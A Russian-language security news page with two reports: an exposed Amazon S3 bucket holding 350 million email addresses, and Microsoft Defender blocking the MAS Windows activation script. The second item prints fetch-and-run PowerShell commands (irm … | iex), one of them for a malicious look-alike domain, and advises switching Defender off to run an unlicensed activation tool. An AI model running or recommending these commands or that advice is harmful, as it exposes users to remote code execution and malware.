В Сети нашли незащищённый сервер с 350 млн уникальных имейлов

В Сети нашли незащищённый сервер с 350 млн уникальных имейлов

В Сети нашли незащищённый сервер с 350 млн уникальных имейлов

Исследователи обнаружили незащищённый сервер, на котором лежали семь гигабайт незашифрованных файлов. Среди общедоступной информации были 350 миллионов записей с уникальными адресами электронной почты.

Открытые данные обнаружила команда CyberNews, установить владельца сервера на данный момент не удалось. Все незащищённые данные хранились в ведре Amazon S3, любой желающий мог беспрепятственно скачать их.

Всего на сервере Amazon AWS лежали 67 файлов. 14 из которых были хешированными. Однако исследователи нашли семь полностью открытых CSV-файлов. В них содержались 50 млн записей уникальных адресов электронной почты, принадлежащих, вероятно, американским пользователям.

 

В общей сложности в файлах можно было найти 350 миллионов имейлов, как в хешированном, так и в открытом виде. Если отталкиваться от временных меток на сервере, некто заливал файлы в ведро поэтапно: сначала хешированные, в самом конце — открытые.

 

Специалисты предполагают, что неизвестный владелец сервера взял все данные на чёрных онлайн-рынках ещё в октябре 2018 года. Пока непонятно, поучили ли другие киберпреступники доступ к этой информации.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru